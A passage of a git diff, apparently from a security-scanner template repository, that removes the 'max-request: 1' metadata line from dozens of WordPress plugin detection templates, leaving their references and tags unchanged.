3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml 